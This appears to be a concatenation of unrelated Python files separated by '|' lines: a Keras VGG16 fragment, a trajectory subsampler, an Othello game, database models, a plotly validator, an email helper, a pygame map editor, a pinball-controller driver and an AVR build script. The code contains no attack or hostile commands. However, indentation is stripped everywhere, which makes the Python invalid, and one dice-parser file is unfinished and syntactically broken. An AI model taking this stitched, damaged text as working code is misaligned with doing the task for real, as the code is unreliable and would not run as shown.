x = MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x)
# Block 5
x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv1')(x)
x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv2')(x)
x = Convolution2D(512, 3, 3, activation='relu', border_mode='same', name='block5_conv3')(x)
x = MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x)
if include_top:
# Classification block
x = Flatten(name='flatten')(x)
x = Dense(4096, activation='relu', name='fc1')(x)
x = Dense(4096, activation='relu', name='fc2')(x)
x = Dense(classes, activation='softmax', name='predictions')(x)
# Ensure that the model takes into account
# any potential predecessors of `input_tensor`.
if input_tensor is not None:
inputs = get_source_inputs(input_tensor)
else:
inputs = img_input
# Create model.
model = Model(inputs, x, name='vgg16')
# load weights
if weights == 'imagenet':
if K.image_dim_ordering() == 'th':
if include_top:
weights_path = get_file('vgg16_weights_th_dim_ordering_th_kernels.h5',
TH_WEIGHTS_PATH,
cache_subdir='models')
else:
weights_path = get_file('vgg16_weights_th_dim_ordering_th_kernels_notop.h5',
TH_WEIGHTS_PATH_NO_TOP,
cache_subdir='models')
model.load_weights(weights_path)
if K.backend() == 'tensorflow':
warnings.warn('You are using the TensorFlow backend, yet you '
'are using the Theano '
'image dimension ordering convention '
'(`image_dim_ordering="th"`). '
'For best performance, set '
'`image_dim_ordering="tf"` in '
'your Keras config '
'at ~/.keras/keras.json.')
convert_all_kernels_in_model(model)
else:
if include_top:
weights_path = get_file('vgg16_weights_tf_dim_ordering_tf_kernels.h5',
TF_WEIGHTS_PATH,
cache_subdir='models')
else:
weights_path = get_file('vgg16_weights_tf_dim_ordering_tf_kernels_notop.h5',
TF_WEIGHTS_PATH_NO_TOP,
cache_subdir='models')
model.load_weights(weights_path)
if K.backend() == 'theano':
convert_all_kernels_in_model(model)
return model
|
import gsd.hoomd
import argparse
import time
start = time.time()
parser = argparse.ArgumentParser(description='Subsamble GSD trajectory')
parser.add_argument('fname',metavar='input',type=str,help='trajectory file to be subsampled')
parser.add_argument('ofname',metavar='output',type=str,help='where to write subsampled trajectory file')
parser.add_argument('N',metavar='N',type=int,help='keep frame each N timesteps')
args = parser.parse_args()
traj = gsd.hoomd.open(args.fname)
frame0 = traj[0]
newtraj = gsd.hoomd.open(args.ofname,'wb')
newtraj.append(frame0)
for i in range(args.N,len(traj),args.N):
s = gsd.hoomd.Snapshot()
pos = traj[i].particles.position
s.particles.position = pos
s.particles.N = len(pos)
newtraj.append(s)
end = time.time()
print('Subsampling took {0} s.'.format(end-start))
|
"""
othello.py Humberto Henrique Campos Pinheiro
Game initialization and main loop
"""
import pygame
import ui
import player
import board
from config import BLACK, WHITE, HUMAN
import log
logger = log.setup_custom_logger('root')
class Othello:
"""
Game main class.
"""
def __init__(self):
""" Show options screen and start game modules"""
# start
self.gui = ui.Gui()
self.board = board.Board()
self.gui.show_menu(self.start)
def start(self, *args):
player1, player2, level = args
logger.info('Settings: player 1: %s, player 2: %s, level: %s ', player1, player2, level)
if player1 == HUMAN:
self.now_playing = player.Human(self.gui, BLACK)
else:
self.now_playing = player.Computer(BLACK, level + 3)
if player2 == HUMAN:
self.other_player = player.Human(self.gui, WHITE)
else:
self.other_player = player.Computer(WHITE, level + 3)
self.gui.show_game()
self.gui.update(self.board.board, 2, 2, self.now_playing.color)
def run(self):
clock = pygame.time.Clock()
while True:
clock.tick(60)
if self.board.game_ended():
whites, blacks, empty = self.board.count_stones()
if whites > blacks:
winner = WHITE
elif blacks > whites:
winner = BLACK
else:
winner = None
break
self.now_playing.get_current_board(self.board)
valid_moves = self.board.get_valid_moves(self.now_playing.color)
if valid_moves != []:
score, self.board = self.now_playing.get_move()
whites, blacks, empty = self.board.count_stones()
self.gui.update(self.board.board, blacks, whites,
self.now_playing.color)
self.now_playing, self.other_player = self.other_player, self.now_playing
self.gui.show_winner(winner)
pygame.time.wait(1000)
self.restart()
def restart(self):
self.board = board.Board()
self.gui.show_menu(self.start)
self.run()
def main():
game = Othello()
game.run()
if __name__ == '__main__':
main()
|
"""
Usage:
run.py mlp --train=<train> --test=<test> --config=<config>
run.py som --train=<train> --test=<test> --config=<config>
Options:
--train Path to training data, txt file.
--test Path to test data, txt file.
--config Json configuration for the network.
"""
from redes_neurais.resources.manager import run_mlp, run_som
import docopt
def run():
try:
args = docopt.docopt(__doc__)
if args["mlp"]:
run_mlp(args['--config'], args['--train'], args['--test'])
if args["som"]:
run_som(args['--config'], args['--train'], args['--test'])
except docopt.DocoptExit as e:
print e.message
if __name__ == "__main__":
run()
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import io
import string
import random
class StringBuf(object):
def __init__(self, s):
self.s = s
self.pos = 0
def peek(self):
return self.s[self.pos]
def getc(self):
c = self.peek()
self.pos += 1
return c
def ungetc(self):
self.pos -= 1
def tell(self):
return self.pos
class Symbol(object):
NUMBER = 0
D = 1
PLUS = 2
MINUS = 3
def __init__(self, type_, pos, value)
def next_symbol(s):
c = s.getc()
while c in string.whitespace:
c = s.getc()
if c in string.digits:
# start of a number
literal = c
c = s.getc()
while c in string.digits:
literal += c
c = s.getc()
s.ungetc()
sym = (Symbol.NUMBER,
elif c == 'd':
# die indicator
pass
elif c == '+':
# plus sign
pass
elif c == '-':
# minus sign
pass
else:
# unrecognized input
raise ValueError('Syntax error at position ' + s.tell())
return ()
|
from __future__ import absolute_import, unicode_literals
from copy import copy
import json
from peewee import Model, CharField, ForeignKeyField, IntegerField
from utils.modules import BaseModule, modules
from utils.modules.api import api as pmb_api
from utils import db
class Action(Model):
class Meta:
database = db
# Name of the module or "__pmb" for the global one
module = CharField()
# Name of the method to call
method = CharField()
# JSON encoded parameters
parameters = CharField()
def get_info(self):
return get_action_info(self)
def get_parameters(self):
return json.loads(self.parameters)
class Command(Model):
class Meta:
database = db
command = CharField(unique=True)
def get_actions(self):
return (
Action
.select()
.join(CommandAction)
.join(Command)
.where(Command.id == self.id)
.order_by(CommandAction.order)
)
def clear_actions(self):
for action in self.get_actions():
action.delete_instance()
for commandaction in (
CommandAction.select()
.join(Command)
.where(Command.id == self.id)
):
commandaction.delete_instance()
class CommandAction(Model):
class Meta:
database = db
command = ForeignKeyField(Command)
action = ForeignKeyField(Action)
order = IntegerField(default=0)
def get_action_info(action):
return get_info_from_module(action.module, action.method)
def get_info_from_module(module, method):
if module == '__pmb':
api = pmb_api
else:
api = modules[module].api
return api[method]
|
import _plotly_utils.basevalidators
class SourceattributionValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(
self,
plotly_name="sourceattribution",
parent_name="layout.mapbox.layer",
**kwargs
):
super(SourceattributionValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "plot"),
role=kwargs.pop("role", "info"),
**kwargs
)
|
f = open("birds.txt", "r")
data = f.read()
f.close()
lines = data.split("\n")
print("Wrong: The number of lines is", len(lines))
for l in lines:
if not l:
# Can also do this: if len(l) == 0
lines.remove(l)
print("Right: The number of lines is", len(lines))
|
from boto.ses import SESConnection
import os
def sendmail(name, comment):
source = "patte.wilhelm@googlemail.com"
subject = "Kommentar eingegangen"
body = 'Es wurde ein neues Wetter bewertet. Von: ' + name + ': ' + comment
to_addresses = ["patte.wilhelm@googlemail.com"]
connection = SESConnection(aws_access_key_id=os.environ['AWS_ACCESS_KEY'],
aws_secret_access_key=os.environ['AWS_SECRET_KEY'])
connection.send_email(source, subject, body, to_addresses)
|
import os
import os.path
import sys
import pygame
from buffalo import utils
from buffalo.scene import Scene
from buffalo.label import Label
from buffalo.button import Button
from buffalo.input import Input
from buffalo.tray import Tray
from camera import Camera
from mapManager import MapManager
from pluginManager import PluginManager
from toolManager import ToolManager
class CameraController:
def __init__(self):
self.fPos = (0.0, 0.0)
self.pos = (int(self.fPos[0]), int(self.fPos[1]))
self.xv, self.yv = 0.0, 0.0
self.speed = 1.2
self.shift_speed = self.speed * 5.0
def update(self, keys):
w, a, s, d, shift = (
keys[pygame.K_w],
keys[pygame.K_a],
keys[pygame.K_s],
keys[pygame.K_d],
keys[pygame.K_LSHIFT],
)
if shift:
speed = self.shift_speed
else:
speed = self.speed
speed *= utils.delta / 16.0
self.xv = 0.0
self.yv = 0.0
if w:
self.yv -= speed
if a:
self.xv -= speed
if s:
self.yv += speed
if d:
self.xv += speed
x, y = self.fPos
x += self.xv
y += self.yv
self.fPos = x, y
self.pos = (int(self.fPos[0]), int(self.fPos[1]))
class EditMapTestScene(Scene):
def on_escape(self):
sys.exit()
def blit(self):
Camera.blitView()
def update(self):
super(EditMapTestScene, self).update()
keys = pygame.key.get_pressed()
self.camera_controller.update(keys)
Camera.update()
MapManager.soft_load_writer()
def __init__(self):
Scene.__init__(self)
self.BACKGROUND_COLOR = (0, 0, 0, 255)
PluginManager.loadPlugins()
self.camera_controller = CameraController()
Camera.lock(self.camera_controller, initial_update=True)
Button.DEFAULT_SEL_COLOR = (50, 50, 100, 255)
self.tool_tray = Tray(
(utils.SCREEN_W - 270, 20),
(250, 800),
min_width=250, max_width=250,
min_height=250, max_height=800,
color=(100, 50, 50, 100),
)
self.tool_tray.labels.add(
Label(
(int(self.tool_tray.width / 2), 10),
"Tool Tray",
color=(255,255,255,255),
x_centered=True,
font="default24",
)
)
self.tool_tray.labels.add(
Label(
(int(self.tool_tray.width / 2), 25),
"________________",
color=(255,255,255,255),
x_centered=True,
font="default18",
)
)
self.tool_tray.labels.add(
Label(
(int(self.tool_tray.width / 2), 50),
"Function",
color=(255,255,255,255),
x_centered=True,
font="default18",
)
)
def set_func_state_to_select():
ToolManager.set_func_state(ToolManager.FUNC_SELECT)
self.tool_tray.render()
self.button_select_mode = Button(
(15, 80),
" Select Mode ",
color=(255,255,255,255),
bg_color=(100,100,200,255),
font="default12",
func=set_func_state_to_select,
)
self.tool_tray.buttons.add(self.button_select_mode)
def set_func_state_to_fill():
ToolManager.set_func_state(ToolManager.FUNC_FILL)
self.tool_tray.render()
self.button_fill_mode = Button(
(self.tool_tray.width - 15, 80),
" Fill Mode ",
color=(255,255,255,255),
bg_color=(100,100,200,255),
invert_x_pos=True,
font="default12",
func=set_func_state_to_fill,
)
self.tool_tray.buttons.add(self.button_fill_mode)
self.tool_tray.labels.add(
Label(
(int(self.tool_tray.width / 2), 120),
"________________",
color=(255,255,255,255),
x_centered=True,
font="default18",
)
)
self.tool_tray.labels.add(
Label(
(int(self.tool_tray.width / 2), 150),
"Area of Effect",
color=(255,255,255,255),
x_centered=True,
font="default18",
)
)
def set_effect_state_to_draw():
ToolManager.set_effect_state(ToolManager.EFFECT_DRAW)
self.tool_tray.render()
self.button_draw_mode = Button(
(15, 180),
" Draw Mode ",
color=(255,255,255,255),
bg_color=(100,100,200,255),
font="default12",
func=set_effect_state_to_draw,
)
self.tool_tray.buttons.add(self.button_draw_mode)
def set_effect_state_to_area():
ToolManager.set_effect_state(ToolManager.EFFECT_AREA)
self.tool_tray.render()
self.button_area_mode = Button(
(self.tool_tray.width - 15, 180),
" Area Mode ",
color=(255,255,255,255),
bg_color=(100,100,200,255),
invert_x_pos=True,
font="default12",
func=set_effect_state_to_area,
)
self.tool_tray.buttons.add(self.button_area_mode)
ToolManager.initialize_states(
ToolManager.FUNC_SELECT, ToolManager.EFFECT_DRAW,
(
self.button_fill_mode,
self.button_select_mode,
self.button_draw_mode,
self.button_area_mode,
),
)
self.tool_tray.render()
self.trays.add(self.tool_tray)
|
"""Contains the drivers and interface code for pinball machines which use the Multimorphic R-ROC hardware controllers.
This code can be used with P-ROC driver boards, or with Stern SAM, Stern
Whitestar, Williams WPC, or Williams WPC95 driver boards.
Much of this code is from the P-ROC drivers section of the pyprocgame project,
written by Adam Preble and Gerry Stellenberg. It was originally released under
the MIT license and is released here under the MIT License.
More info on the P-ROC hardware platform: http://pinballcontrollers.com/
Original code source on which this module was based:
https://github.com/preble/pyprocgame
"""
from typing import Dict, List
from mpf.core.platform import DmdPlatform, DriverConfig, SwitchConfig, SegmentDisplaySoftwareFlashPlatform
from mpf.devices.segment_display.segment_display_text import ColoredSegmentDisplayText
from mpf.platforms.interfaces.dmd_platform import DmdPlatformInterface
from mpf.platforms.interfaces.segment_display_platform_interface import SegmentDisplaySoftwareFlashPlatformInterface
from mpf.platforms.p_roc_common import PDBConfig, PROCBasePlatform
from mpf.core.utility_functions import Util
from mpf.platforms.p_roc_devices import PROCDriver
MYPY = False
if MYPY: # pragma: no cover
from mpf.core.machine import MachineController # pylint: disable-msg=cyclic-import,unused-import
class PRocHardwarePlatform(PROCBasePlatform, DmdPlatform, SegmentDisplaySoftwareFlashPlatform):
"""Platform class for the P-ROC hardware controller.
Args:
----
machine: The MachineController instance.
"""
__slots__ = ["dmd", "alpha_display", "aux_port", "_use_extended_matrix",
"_use_first_eight_direct_inputs"]
def __init__(self, machine):
"""Initialise P-ROC."""
super().__init__(machine)
# validate config for p_roc
self.config = self.machine.config_validator.validate_config("p_roc", self.machine.config.get('p_roc', {}))
self._configure_device_logging_and_debug('P-Roc', self.config)
if self.config['driverboards']:
self.machine_type = self.pinproc.normalize_machine_type(self.config['driverboards'])
else:
self.machine_type = self.pinproc.normalize_machine_type(self.machine.config['hardware']['driverboards'])
self.dmd = None
self.alpha_display = None
self.aux_port = None
self._use_extended_matrix = False
self._use_first_eight_direct_inputs = False
async def connect(self):
"""Connect to the P-Roc."""
await super().connect()
self.aux_port = AuxPort(self)
self.aux_port.reset()
# Because PDBs can be configured in many different ways, we need to
# traverse the YAML settings to see how many PDBs are being used.
# Then we can configure the P-ROC appropriately to use those PDBs.
# Only then can we relate the YAML coil/light #'s to P-ROC numbers for
# the collections.
if self.machine_type == self.pinproc.MachineTypePDB:
self.debug_log("Configuring P-ROC for PDBs (P-ROC driver boards)")
self.pdbconfig = PDBConfig(self, self.machine.config, self.pinproc.DriverCount)
else:
self.debug_log("Configuring P-ROC for OEM driver boards")
def _get_default_subtype(self):
"""Return default subtype for P-Roc."""
return "matrix"
def __repr__(self):
"""Return string representation."""
return '<Platform.P-ROC>'
def get_info_string(self):
"""Dump infos about boards."""
infos = "Firmware Version: {} Firmware Revision: {} Hardware Board ID: {}\n".format(
self.version, self.revision, self.hardware_version)
return infos
@classmethod
def get_coil_config_section(cls):
"""Return coil config section."""
return "p_roc_coils"
def configure_driver(self, config: DriverConfig, number: str, platform_settings: dict):
"""Create a P-ROC driver.
Typically drivers are coils or flashers, but for the P-ROC this is
also used for matrix-based lights.
Args:
----
config: Dictionary of settings for the driver.
number: Number of this driver
platform_settings: Platform specific setting for this driver.
Returns a reference to the PROCDriver object which is the actual object
you can use to pulse(), patter(), enable(), etc.
"""
# todo need to add Aux Bus support
# todo need to add virtual driver support for driver counts > 256
# Find the P-ROC number for each driver. For P-ROC driver boards, the
# P-ROC number is specified via the Ax-By-C format. For OEM driver
# boards configured via driver numbers, libpinproc's decode() method
# can provide the number.
if self.machine_type == self.pinproc.MachineTypePDB:
proc_num = self.pdbconfig.get_proc_coil_number(str(number))
if proc_num == -1:
raise AssertionError("Driver {} cannot be controlled by the P-ROC. ".format(str(number)))
else:
proc_num = self.pinproc.decode(self.machine_type, str(number))
polarity = platform_settings.get("polarity", None)
driver = PROCDriver(proc_num, config, self, number, polarity)
self._late_init_futures.append(driver.initialise())
return driver
def configure_switch(self, number: str, config: SwitchConfig, platform_config: dict):
"""Configure a P-ROC switch.
Args:
----
number: String number of the switch to configure.
config: SwitchConfig settings.
platform_config: Platform specific settings.
Returns: A configured switch object.
"""
del platform_config
try:
if number.startswith("SD") and 0 <= int(number[2:]) <= 7:
self._use_first_eight_direct_inputs = True
_, y = number.split('/', 2)
if int(y) > 7:
self._use_extended_matrix = True
except ValueError:
pass
if self._use_extended_matrix and self._use_first_eight_direct_inputs:
raise AssertionError(
"P-Roc vannot use extended matrix and the first eight direct inputs at the same "
"time. Either only use SD8 to SD31 or only use matrix X/Y with Y <= 7. Offending "
"switch: {}".format(number))
if self.machine_type == self.pinproc.MachineTypePDB:
proc_num = self.pdbconfig.get_proc_switch_number(str(number))
if proc_num == -1:
raise AssertionError("Switch {} cannot be controlled by the P-ROC. ".format(str(number)))
else:
proc_num = self.pinproc.decode(self.machine_type, str(number))
return self._configure_switch(config, proc_num)
async def get_hw_switch_states(self) -> Dict[str, bool]:
"""Read in and set the initial switch state.
The P-ROC uses the following values for hw switch states:
1 - closed (debounced)
2 - open (debounced)
3 - closed (not debounced)
4 - open (not debounced)
"""
switch_states = await self.run_proc_cmd("switch_get_states")
states = {}
for switch, state in enumerate(switch_states):
states[switch] = bool(state in (1, 3))
return states
def configure_dmd(self):
"""Configure a hardware DMD connected to a classic P-ROC."""
self.dmd = PROCDMD(self, self.machine)
return self.dmd
async def configure_segment_display(self, number: str, display_size: int, platform_settings) \
-> "SegmentDisplaySoftwareFlashPlatformInterface":
"""Configure display."""
del platform_settings
del display_size
number_int = int(number)
if 0 < number_int >= 4:
raise AssertionError("Number must be between 0 and 3 for p_roc segment display.")
if not self.alpha_display:
self.alpha_display = AuxAlphanumericDisplay(self, self.aux_port)
display = PRocAlphanumericDisplay(self.alpha_display, number_int)
self._handle_software_flash(display)
return display
def process_events(self, events):
"""Process events from the P-Roc."""
for event in events:
event_type = event['type']
event_value = event['value']
if event_type == self.pinproc.EventTypeDMDFrameDisplayed:
# ignore this for now
pass
elif event_type in (self.pinproc.EventTypeSwitchClosedDebounced,
self.pinproc.EventTypeSwitchClosedNondebounced):
self.machine.switch_controller.process_switch_by_num(
state=1, num=event_value, platform=self)
elif event_type in (self.pinproc.EventTypeSwitchOpenDebounced,
self.pinproc.EventTypeSwitchOpenNondebounced):
self.machine.switch_controller.process_switch_by_num(
state=0, num=event_value, platform=self)
else:
self.log.warning("Received unrecognized event from the P-ROC. "
"Type: %s, Value: %s", event_type, event_value)
class PROCDMD(DmdPlatformInterface):
"""Parent class for a physical DMD attached to a P-ROC.
Args:
----
platform: Reference to the MachineController's proc attribute.
machine: Reference to the MachineController
"""
__slots__ = ["machine", "platform"]
def __init__(self, platform, machine):
"""Set up DMD."""
self.platform = platform # type: PROCBasePlatform
self.machine = machine # type: MachineController
# dmd_timing defaults should be 250, 400, 180, 800
if self.machine.config['p_roc']['dmd_timing_cycles']:
dmd_timing = Util.string_to_event_list(
self.machine.config['p_roc']['dmd_timing_cycles'])
self.platform.run_proc_cmd_no_wait("dmd_update_config", dmd_timing)
def set_brightness(self, brightness: float):
"""Set brightness."""
# currently not supported. can be implemented using dmd_timing_cycles
assert brightness == 1.0
def update(self, data):
"""Update the DMD with a new frame.
Args:
----
data: A 4096-byte raw string.
"""
if len(data) == 4096:
self.platform.run_proc_cmd_no_wait("_dmd_send", data)
else:
self.machine.log.warning("Received DMD frame of length %s instead"
"of 4096. Discarding...", len(data))
class AuxPort:
"""Aux port on the P-Roc."""
__slots__ = ["platform", "_commands"]
def __init__(self, platform):
"""Initialise aux port."""
self.platform = platform
self._commands = []
def reset(self):
"""Reset aux port."""
commands = [self.platform.pinproc.aux_command_disable()]
for _ in range(1, 255):
commands += [self.platform.pinproc.aux_command_jump(0)]
self.platform.run_proc_cmd_no_wait("aux_send_commands", 0, commands)
def reserve_index(self):
"""Return index of next free command slot and reserve it."""
self._commands += [[]]
return len(self._commands) - 1
def update(self, index, commands):
"""Update command slot with command."""
self._commands[index] = commands
self._write_commands()
def _write_commands(self):
"""Write commands to hardware."""
# disable program
commands = [self.platform.pinproc.aux_command_disable()]
# build command list
for command_set in self._commands:
commands += command_set
self.platform.run_proc_cmd_no_wait("aux_send_commands", 0, commands)
# jump from slot 0 to slot 1. overwrites the disable
self.platform.run_proc_cmd_no_wait("aux_send_commands", 0, [self.platform.pinproc.aux_command_jump(1)])
class PRocAlphanumericDisplay(SegmentDisplaySoftwareFlashPlatformInterface):
"""Since AuxAlphanumericDisplay updates all four displays wrap it and set the correct offset."""
__slots__ = ["display"]
def __init__(self, display, index):
"""Initialise alpha numeric display."""
super().__init__(index)
self.display = display
def _set_text(self, text: ColoredSegmentDisplayText):
"""Set digits to display."""
# TODO: use DisplayCharacter and intern dots and commas
self.display.set_text(text.convert_to_str(), self.number)
class AuxAlphanumericDisplay:
"""An alpha numeric display connected to the aux port on the P-Roc."""
# Start at ASCII table offset 32: ' '
ascii_segments = [0x0000, # ' '
0x016a, # '!' Random Debris Character 1
0x3014, # '"' Random Debris Character 2
0x5d80, # '#' Random Debris Character 3
0x00a4, # '$' Random Debris Character 4
0x3270, # '%' Random Debris Character 5
0x4640, # '&' Random Debris Character 6
0x0200, # '''
0x1400, # '('
0x4100, # ')'
0x7f40, # '*'
0x2a40, # '+'
0x8080, # ','
0x0840, # '-'
0x8000, # '.'
0x4400, # '/'
0x003f, # '0'
0x0006, # '1'
0x085b, # '2'
0x084f, # '3'
0x0866, # '4'
0x086d, # '5'
0x087d, # '6'
0x0007, # '7'
0x087f, # '8'
0x086f, # '9'
0x0821, # ':' Random Debris Character 7
0x1004, # ';' Random Debris Character 8
0x1c00, # '<' Left Arrow
0x1386, # '=' Random Debris Character 9
0x4140, # '>' Right Arrow
0x0045, # '?' Random Debris Character 10
0x4820, # '@' Random Debris Character 11
0x0877, # 'A'
0x2a4f, # 'B'
0x0039, # 'C'
0x220f, # 'D'
0x0879, # 'E'
0x0871, # 'F'
0x083d, # 'G'
0x0876, # 'H'
0x2209, # 'I'
0x001e, # 'J'
0x1470, # 'K'
0x0038, # 'L'
0x0536, # 'M'
0x1136, # 'N'
0x003f, # 'O'
0x0873, # 'P'
0x103f, # 'Q'
0x1873, # 'R'
0x086d, # 'S'
0x2201, # 'T'
0x003e, # 'U'
0x4430, # 'V'
0x5036, # 'W'
0x5500, # 'X'
0x2500, # 'Y'
0x4409, # 'Z'
0x6004, # '[' Random Debris Character 12
0x6411, # '\' Random Debris Character 13
0x780a, # ']' Random Debris Character 14
0x093a, # '^' Random Debris Character 15
0x0008, # '_'
0x2220, # '`' Random Debris Character 16
0x0c56, # 'a' Broken Letter a
0x684e, # 'b' Broken Letter b
0x081c, # 'c' Broken Letter c
0x380e, # 'd' Broken Letter d
0x1178, # 'e' Broken Letter e
0x4831, # 'f' Broken Letter f
0x083d, # 'g' Broken Letter g NOT CREATED YET
0x0854, # 'h' Broken Letter h
0x2209, # 'i' Broken Letter i NOT CREATED YET
0x001e, # 'j' Broken Letter j NOT CREATED YET
0x1070, # 'k' Broken Letter k
0x0038, # 'l' Broken Letter l NOT CREATED YET
0x0536, # 'm' Broken Letter m NOT CREATED YET
0x1136, # 'n' Broken Letter n NOT CREATED YET
0x085c, # 'o' Broken Letter o
0x0873, # 'p' Broken Letter p NOT CREATED YET
0x103f, # 'q' Broken Letter q NOT CREATED YET
0x1c72, # 'r' Broken Letter r
0x116c, # 's' Broken Letter s
0x2120, # 't' Broken Letter t
0x003e, # 'u' Broken Letter u NOT CREATED YET
0x4430, # 'v' Broken Letter v NOT CREATED YET
0x5036, # 'w' Broken Letter w NOT CREATED YET
0x5500, # 'x' Broken Letter x NOT CREATED YET
0x2500, # 'y' Broken Letter y NOT CREATED YET
0x4409 # 'z' Broken Letter z NOT CREATED YET
]
strobes = [8, 9, 10, 11, 12]
full_intensity_delay = 350 # microseconds
inter_char_delay = 40 # microseconds
__slots__ = ["platform", "aux_controller", "aux_index", "texts"]
def __init__(self, platform, aux_controller):
"""Initialise the alphanumeric display."""
self.platform = platform
self.aux_controller = aux_controller
self.aux_index = aux_controller.reserve_index()
self.texts = [" "] * 4
def set_text(self, text, index):
"""Set text for display."""
if len(text) != 8:
text = text[0:8].rjust(8, ' ')
self.texts[index] = text
# build expected format
input_strings = [self.texts[0] + self.texts[1], self.texts[2] + self.texts[3]]
self.display(input_strings)
def display(self, input_strings, intensities=None):
"""Set display text."""
strings = []
if intensities is None:
intensities = [[1] * 16] * 2
# Make sure strings are at least 16 chars.
# Then convert each string to a list of chars.
for j in range(0, 2):
if len(input_strings[j]) < 16:
input_strings[j] += ' ' * (16 - len(input_strings[j]))
strings += [list(input_strings[j])]
# Make sure insensities are 1 or less
for i in range(0, 16):
for j in range(0, 2):
if intensities[j][i] > 1:
intensities[j][i] = 1
commands = []
char_on_time = []
char_off_time = []
# Initialize a 2x16 array for segments value
segs = [[0] * 16 for _ in range(2)]
# Loop through each character
for i in range(0, 16):
# Activate the character position (this goes to both displayas)
commands += [self.platform.pinproc.aux_command_output_custom(i, 0, self.strobes[0], False, 0)]
for j in range(0, 2):
segs[j][i] = self.ascii_segments[ord(strings[j][i]) - 32]
# Check for commas or periods.
# If found, squeeze comma into previous character.
# No point checking the last character (plus, this avoids an
# indexing error by not checking i+1 on the 16th char.
if i < 15:
comma_dot = strings[j][i + 1]
if comma_dot in (".", ","):
segs[j][i] |= self.ascii_segments[ord(comma_dot) - 32]
strings[j].remove(comma_dot)
# Append a space to ensure there are enough chars.
strings[j].append(' ')
# character is 16 bits long, characters are loaded in 2 lots of 8 bits,
# for each display (4 enable lines total)
commands += [self.platform.pinproc.aux_command_output_custom(
segs[j][i] & 0xff, 0,
self.strobes[j * 2 + 1], False, 0)] # first 8 bits of characater data
commands += [self.platform.pinproc.aux_command_output_custom(
(segs[j][i] >> 8) & 0xff, 0,
self.strobes[j * 2 + 2], False, 0)] # second 8 bits of characater data
char_on_time += [intensities[j][i] * self.full_intensity_delay]
char_off_time += [self.inter_char_delay + (self.full_intensity_delay - char_on_time[j])]
if char_on_time[0] < char_on_time[1]:
first = 0
second = 1
else:
first = 1
second = 0
# Determine amount of time to leave the other char on after the
# first is off.
between_delay = char_on_time[second] - char_on_time[first]
# Not sure if the hardware will like a delay of 0
# Use 2 to be extra safe. 2 microseconds won't affect display.
if between_delay == 0:
between_delay = 2
# Delay until it's time to turn off the character with the lowest intensity
commands += [self.platform.pinproc.aux_command_delay(char_on_time[first])]
commands += [self.platform.pinproc.aux_command_output_custom(0, 0, self.strobes[first * 2 + 1], False, 0)]
commands += [self.platform.pinproc.aux_command_output_custom(0, 0, self.strobes[first * 2 + 2], False, 0)]
# Delay until it's time to turn off the other character.
commands += [self.platform.pinproc.aux_command_delay(between_delay)]
commands += [self.platform.pinproc.aux_command_output_custom(0, 0, self.strobes[second * 2 + 1], False, 0)]
commands += [self.platform.pinproc.aux_command_output_custom(0, 0, self.strobes[second * 2 + 2], False, 0)]
# Delay for the inter-digit delay.
commands += [self.platform.pinproc.aux_command_delay(char_off_time[second])]
# Send the new list of commands to the Aux port controller.
self.aux_controller.update(self.aux_index, commands)
|
"""
Builder for Atmel AVR series of microcontrollers
"""
from os.path import join
from time import sleep
from SCons.Script import (COMMAND_LINE_TARGETS, AlwaysBuild, Default,
DefaultEnvironment, SConscript)
from platformio.util import get_serialports
def BeforeUpload(target, source, env): # pylint: disable=W0613,W0621
def _rpi_sysgpio(path, value):
with open(path, "w") as f:
f.write(str(value))
if "micronucleus" in env['UPLOADER']:
print "Please unplug/plug device ..."
upload_options = env.get("BOARD_OPTIONS", {}).get("upload", {})
if "usb" in env.subst("$UPLOAD_PROTOCOL"):
upload_options['require_upload_port'] = False
env.Replace(UPLOAD_SPEED=None)
if env.subst("$UPLOAD_SPEED"):
env.Append(UPLOADERFLAGS=[
"-b", "$UPLOAD_SPEED",
"-D"
])
if not upload_options.get("require_upload_port", False):
return
env.AutodetectUploadPort()
env.Append(UPLOADERFLAGS=["-P", "$UPLOAD_PORT"])
if env.subst("$BOARD") == "raspduino":
_rpi_sysgpio("/sys/class/gpio/export", 18)
_rpi_sysgpio("/sys/class/gpio/gpio18/direction", "out")
_rpi_sysgpio("/sys/class/gpio/gpio18/value", 1)
sleep(0.1)
_rpi_sysgpio("/sys/class/gpio/gpio18/value", 0)
_rpi_sysgpio("/sys/class/gpio/unexport", 18)
else:
if not upload_options.get("disable_flushing", False):
env.FlushSerialBuffer("$UPLOAD_PORT")
before_ports = [i['port'] for i in get_serialports()]
if upload_options.get("use_1200bps_touch", False):
env.TouchSerialPort("$UPLOAD_PORT", 1200)
if upload_options.get("wait_for_upload_port", False):
env.Replace(UPLOAD_PORT=env.WaitForNewSerialPort(before_ports))
env = DefaultEnvironment()
SConscript(env.subst(join("$PIOBUILDER_DIR", "scripts", "baseavr.py")))
if "digispark" in env.get(
"BOARD_OPTIONS", {}).get("build", {}).get("core", ""):
env.Replace(
UPLOADER=join("$PIOPACKAGES_DIR", "tool-micronucleus", "micronucleus"),
UPLOADERFLAGS=[
"-c", "$UPLOAD_PROTOCOL",
"--timeout", "60"
],
UPLOADHEXCMD='"$UPLOADER" $UPLOADERFLAGS $SOURCES'
)
else:
env.Replace(
UPLOADER=join("$PIOPACKAGES_DIR", "tool-avrdude", "avrdude"),
UPLOADERFLAGS=[
"-v",
"-p", "$BOARD_MCU",
"-C",
'"%s"' % join("$PIOPACKAGES_DIR", "tool-avrdude", "avrdude.conf"),
"-c", "$UPLOAD_PROTOCOL"
],
UPLOADHEXCMD='"$UPLOADER" $UPLOADERFLAGS -U flash:w:$SOURCES:i',
UPLOADEEPCMD='"$UPLOADER" $UPLOADERFLAGS -U eeprom:w:$SOURCES:i'
)
target_elf = env.BuildFirmware()
target_eep = env.Alias("eep", env.ElfToEep(join("$BUILD_DIR", "firmware"),
target_elf))
if "uploadlazy" in COMMAND_LINE_TARGETS:
target_firm = join("$BUILD_DIR", "firmware.hex")
else:
target_firm = env.ElfToHex(join("$BUILD_DIR", "firmware"), target_elf)
target_size = env.Alias("size", target_elf, "$SIZEPRINTCMD")
AlwaysBuild(target_size)
upload = env.Alias(["upload", "uploadlazy"], target_firm,
[BeforeUpload, "$UPLOADHEXCMD"])
AlwaysBuild(upload)
uploadeep = env.Alias("uploadeep", target_eep, [
BeforeUpload, "$UPLOADEEPCMD"])
